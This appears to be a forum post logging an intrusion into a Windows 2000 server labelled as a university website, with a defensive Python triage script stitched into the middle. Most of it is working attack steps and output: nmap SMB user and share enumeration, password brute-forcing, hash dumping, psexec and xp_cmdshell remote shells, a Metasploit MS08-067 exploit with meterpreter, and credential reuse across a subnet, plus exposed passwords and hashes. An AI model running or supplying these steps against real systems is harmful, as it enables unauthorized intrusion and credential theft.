Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the SMB scripts

-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to enumerate the account names present on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // dump the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "   // log in remotely as sa and run a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
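Added example, not part of the original post: a small Python triage script that reads the Nmap host-script output shown above (smb-enum-shares, smb-brute, smb-pwdump, smb-check-vulns) and reduces it to the findings a defender has to fix: a share readable over a null session, accounts that accept a blank or guessed password, accounts with an empty or LM-hashed password, and the missing MS08-067 patch. The sample input is constructed in the shape of the page's output; its hash values and the svc account are made up.

```python
import re

EMPTY_LM_HALF = "AAD3B435B51404EE"   # LM hash of an empty 7-byte half
EMPTY_LM = EMPTY_LM_HALF * 2         # LM hash recorded when LM storage is disabled

# Constructed sample shaped like the page's NSE output; hash values and the svc account are made up.
SAMPLE = """\
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 0123456789ABCDEFAAD3B435B51404EE:0123456789ABCDEF0123456789ABCDEF
|_ svc:1003 => AAD3B435B51404EEAAD3B435B51404EE:FEDCBA9876543210FEDCBA9876543210
| smb-check-vulns:
|_ MS08-067: VULNERABLE
"""

def triage(text):
    """Turn Nmap smb-* host-script output into defender-facing findings."""
    findings, script, share = [], None, None
    for raw in text.splitlines():
        line = raw.lstrip("|_ ").strip()          # drop Nmap's "| " / "|_ " tree prefix
        if line.startswith("smb-") and line.endswith(":"):
            script = line[:-1]                     # a new script section begins
        elif script == "smb-enum-shares":
            if line.endswith("$"):
                share = line
            elif line.startswith("Anonymous access:") and not line.endswith("<none>"):
                findings.append(f"{share}: anonymous (null-session) access {line.split(': ')[1]}")
        elif script == "smb-brute" and (m := re.match(r"([^:]+):(\S*) => Login was successful", line)):
            kind = "blank" if m.group(2) == "<blank>" else "guessable"
            findings.append(f"{m.group(1)}: accepts a {kind} password")
        elif script == "smb-pwdump" and (m := re.match(r"([^:]+):(\d+) => ([^:]+):(.+)", line)):
            user, rid, lm, nt = m.groups()         # pwdump format: user:rid => LMhash:NThash
            if nt.startswith("NO PASSWORD"):
                findings.append(f"{user}: empty password (RID {rid})")
            elif lm.upper() != EMPTY_LM:           # an LM hash is stored: password is 14 chars or fewer
                short = lm.upper().endswith(EMPTY_LM_HALF)
                findings.append(f"{user}: LM hash stored, password is {'at most 7' if short else '8 to 14'} characters")
        elif script == "smb-check-vulns" and line.endswith(": VULNERABLE"):
            findings.append(f"{line.split(':')[0]}: unpatched")
    return findings
```

The LM check rests on AAD3B435B51404EE being the LM hash of an empty 7-byte half: a stored LM hash that ends in it means the password is seven characters or shorter, and a host that stores any LM hash at all still has LM hashing enabled.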

root@bt:~# msfconsole   // exploit MS08-067 against the target from msf

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the captured hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf + nmap attack~~